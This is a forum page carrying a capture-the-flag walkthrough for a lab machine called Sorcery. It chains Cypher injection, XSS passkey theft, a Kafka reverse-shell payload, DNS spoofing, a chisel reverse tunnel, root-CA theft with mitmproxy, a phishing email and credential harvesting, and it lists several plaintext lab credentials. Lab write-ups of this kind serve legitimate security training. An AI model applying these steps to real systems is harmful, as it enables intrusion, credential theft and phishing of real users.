Subcategories

• Pwn Boxes
  1
  Topics
  1
  Posts

  L

  Step 1: Recon / Enumeration

  Run nmap:

  nmap -T4 -vv -sC -sV -oN nmap/intial 10.129.161.83

  Discovered open ports:

  22/tcp -> SSH (OpenSSH 9.6p1) 443/tcp -> HTTPS (nginx/1.27.1) Step 2: Web Enumeration

  Access main website:

  https://sorcery.htb/auth/login

  Discover Git server:

  https://git.sorcery.htb

  Clone repository:

  GIT_SSL_NO_VERIFY=true git clone https://git.sorcery.htb/nicole_sullivan/infrastructure.git Step 3: Register User

  Register at:

  https://sorcery.htb/auth/register Step 4: Cypher Injection for Registration Key

  Inject Cypher query to extract registration key:

  https://sorcery.htb/dashboard/store/88b6b6c5...%2F%2F

  Found registration key:

  dd05d743-b560-45dc-9a09-43ab18c7a513

  Register as seller using this key

  Step 5: XSS to Extract Admin Passkey

  Access:

  https://sorcery.htb/dashboard/new-product

  Trigger XSS to extract admin credentials

  Step 6: Cypher Injection to Reset Admin Password

  Inject payload:

  https://sorcery.htb/dashboard/store/...%2F%2F

  Admin password set to:

  haxforums Step 7: Login with Passkey Use WebDevAuthn extension Login using Passkey: admin Step 8: Kafka Exploitation

  Setup Kafka via docker-compose

  Extract topic from main.rs: update

  Send reverse shell payload via Kafka:

  python3 exploit_kafka.py

  Monitor traffic in Wireshark (Loopback)

  Step 9: DNS Spoofing

  Modify /dns/hosts-user

  echo '10.10.15.11 pain.sorcery.htb' >> /dns/hosts-user ./convert.sh pkill -9 dnsmasq Step 10: Chisel Tunnel for Proxy

  Serve chisel binary:

  python3 -m http.server 80

  Start client:

  ./chisel client 10.10.15.11:5555 R:socks

  Start server:

  ./chisel_arm server --port 5555 --reverse --socks5 Step 11: Download RootCA and Sign Certificate

  Use proxychains to download RootCA:

  curl ftp://172.19.0.2/pub/RootCA.key curl ftp://172.19.0.2/pub/RootCA.crt

  Sign cert and start mitmproxy:

  mitmproxy --mode reverse:https://git.sorcery.htb ... Step 12: Phishing via Mail

  Send phishing mail to tom_summers

  swaks --to [email protected] --data "..."

  Retrieve credentials:

  tom_summers : jNsMKQ6k2.XDMPu. Step 13: Extract Screenshot & OCR

  Get screen dump:

  wget http://10.10.11.71:2004/Xvfb_screen0 mv Xvfb_screen0 text.xwd convert text.xwd text.png tesseract text.png output cat output.txt

  Found creds:

  tom_summers_admin : dWpuk7cesBjT- Step 14: Privilege Escalation with Strace

  Run trace.sh to monitor docker login

  Trigger docker login:

  sudo -u rebecca_smith /usr/bin/docker login

  Extracted creds:

  rebecca_smith : -7eAZDp9-f9mg Step 15: Use Proxy to Extract Docker Blob

  Use proxychains:

  curl -u 'rebecca_smith:...' http://127.0.0.1:5000/...

  Found creds:

  donna_adams : 3FEVPCT_c3xDH ash_winter : w@LoiU8Crmdep Step 16: Root Privileges

  SSH into ash_winter

  Add to sudoers via ipa commands:

  ipa group-add-member sysadmins --users=ash_winter ipa sudorule-add-user allow_sudo --users=ash_winter sudo /usr/bin/systemctl restart sssd

  Become root:

  sudo su cat /root/root.txt
• Wireless Security
  0
  Topics
  0
  Posts
  No new posts.
• Social Engineering
  0
  Topics
  0
  Posts
  No new posts.
• Adversary Simulation
  0
  Topics
  0
  Posts
  No new posts.
• Exploits & Vulnerabilities
  0
  Topics
  0
  Posts
  No new posts.
• Web Application Security
  0
  Topics
  0
  Posts
  No new posts.
• Ethical Hacking & Penetration Testing
  0
  Topics
  0
  Posts
  No new posts.